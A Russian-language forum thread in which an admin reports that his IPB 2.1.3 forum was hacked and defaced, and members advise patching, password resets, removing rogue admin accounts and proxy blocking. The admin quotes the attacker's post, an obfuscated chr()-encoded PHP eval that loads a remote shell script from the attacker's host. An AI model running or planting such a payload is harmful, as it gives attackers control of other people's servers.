HaCkEd By D3nGeR

[SDron]

Недавно мой форум взломали посредством shell`а. Верия форума 2.1.3.

Заплатки я давно не ставил, поэтому после взлома сразу же все поставил.

 

Заменили index.php на index.html со словами HaCkEd By D3nGeR. (его ip 212.116.219.5)

Так же удалили в корне сайта папку images, удалили все php файлы в корне сайта и форума.

Когда я восстановил форум, то увидел, что красуется пост с довольно интересным содержанием

eval( chr(105). chr(110). chr(99). chr(108). chr(117). chr(100). chr(101). chr(32). chr(34). chr(104). chr(116). chr(116). chr(112). chr(58). chr(47). chr(47). chr(119). chr(119). chr(119). chr(46). chr(100). chr(51). chr(110). chr(103). chr(101). chr(114). chr(46). chr(98). chr(121). chr(46). chr(114). chr(117). chr(47). chr(114). chr(53). chr(55). chr(46). chr(116). chr(120). chr(116). chr(34). chr(59). chr(47). chr(42). chr(32) ); //eval( chr(105). chr(110). chr(99). chr(108). chr(117). chr(100). chr(101). chr(32). chr(34). chr(104). chr(116). chr(116). chr(112). chr(58). chr(47). chr(47). chr(119). chr(119). chr(119). chr(46). chr(100). chr(51). chr(110). chr(103). chr(101). chr(114). chr(46). chr(98). chr(121). chr(46). chr(114). chr(117). chr(47). chr(114). chr(53). chr(55). chr(46). chr(116). chr(120). chr(116). chr(34). chr(59). chr(47). chr(42). chr(32) ); //

 

Кому интересно, могу дать и access_log.

 

Хостеру я уже стукнул, но то, что я поставил заплатки - они меня спасут от этой атаки?

 

Буду благодарен за ответы.

[Roman Borisovich]

Интересно их можно прописать в бан? (типа запрещеные к регистрации имена) Или в другое место прописать можно ?

[holod2007]

Актуальные версии просто нужно ставить и латать дырки

2.1.6 этого бага уже не содержит.

[SDron]

Хотелось просто узнать тогда какакая именно заплатка ставится под этот случай?

[Frike]

Вот эта уязвимость

Обновление безопасности в IPB 2.x.x (25.04.06)

 

Запрещенные к регистрации имена прописываются в админке

[SDron]

Вот эта уязвимость

Обновление безопасности в IPB 2.x.x (25.04.06)

 

Запрещенные к регистрации имена прописываются в админке

 

Спасибо.

 

 

После такого взлома нужно ли еще какие то дествия (бан Ip на форуме, смена паролей...) производить?

 

Дарка закрыта, но может хакер до сих пор представляет угрозу?

[Frike]

Обнови форум до последней версии

Проверь все файлы которые не были заменены при обновлении

Попроси пользователей сменить пароли

[holod2007]

Проверь и удали левые админские учётки

[GiV]

Если какир умный то он бэкдор себе еще оставил.

[Yos]

Я бы посоветовал тебе обновить до версии 2.1.7 - мну пытались поломать, но не смогли

[~ANDRUHA~]

Удалите ссылку там троян.

[sudmed]

Удалите ссылку там троян.

да там целая коллекция шеллов )

[www.grom.big-bossa.com]

Актуальные версии просто нужно ставить и латать дырки

2.1.6 этого бага уже не содержит.

Содержит, ломали шелом

[Nonamers]

Содержит, ломали шелом

Эксплойт для 2.1.6 есть хороший Ваши данные за пару минут можно получить, ну если же конечно пароль из цифр или букв того же регистра состоит и примитивный

Обновляйте до 2.1.7

[Song]

Хотелось просто узнать тогда какакая именно заплатка ставится под этот случай?

а ты ставишь заплатки только по факту взлому "какие именно"?

 

Содержит, ломали шелом

Эксплойт для 2.1.6 есть хороший Ваши данные за пару минут можно получить, ну если же конечно пароль из цифр или букв того же регистра состоит и примитивный

Обновляйте до 2.1.7

это из разряда "что-то слышал, но вот что, никак не припомню"

[Nonamers]

это из разряда "что-то слышал, но вот что, никак не припомню"

бывает..

[SiDChik]

Может давно стоит создать мод "Чёрный список IP"? который бы с базы в интернете брал ip адресы с сайта. В которой какраз будет чёрный список прокси и прочее

[Milse]

Такой мод уже есть.

[-Зверик-]

Milse, где такой мод?

 

SiDChik, ага, айпихи берутся из публичных мест где прокси дают?

 

Видел такой на милворме. И что? 20 минут поиска и ты находишь новый,незасвеченный прокси. Я нашел штук 5 без проблем.

 

Так что это лишь чрезмерная и лишняя нагрузка на сервер.

А что если хацкер сам проксей насканил, или они из private откуда-то?

 

 

Патчите свои доски вовремя, что еще сказать.. иметь старую 2.1.3 и жаловатся на взлом, имхо, это глупо.

[SiDChik]

Под созданием я имел ввиду ещё и сайт, на котором всё и проверяется, плюс если учитывать обратную связь с форума, то может что и хорошое получится

[-Зверик-]

Давай-ка погуглим "free proxy list" .

 

Results 1 - 10 of about 107,000 for "free proxy list". (0.05 seconds)

 

100 тысяч результатов.

 

Хороших сайтов, где можно нарыть свежие насканенные прокси - пару десятков. Ты их будешь проверять каждые полчаса на изменения, а потом банить громадные списки айпих?

 

Есть вариант сделать нечто proxyjudge и банить всех у кого прокси уровня менее чем "elite" (не показывает что он прокси), но как много людей используют прокси, который предоставленный их провайдером или работой?

 

А фильтровать все эти списки нереально (не действенно), я уже написал почему. Да, я видел сайт который фильтрует это все с новых и популярных списков, но потратив 20 минут времени, я смог найти прокси которые он еще не успел включить в список..

 

Не мудрите себе голову. Апдейте свою доску, поставьте модуль от Vic'er'a, бек-аптесь ежедневно, и будет вам счастье.

[hfv]

Нашел такую страницу: http://downloads.securityfocus.com/vulnera...3nGeR-17439.php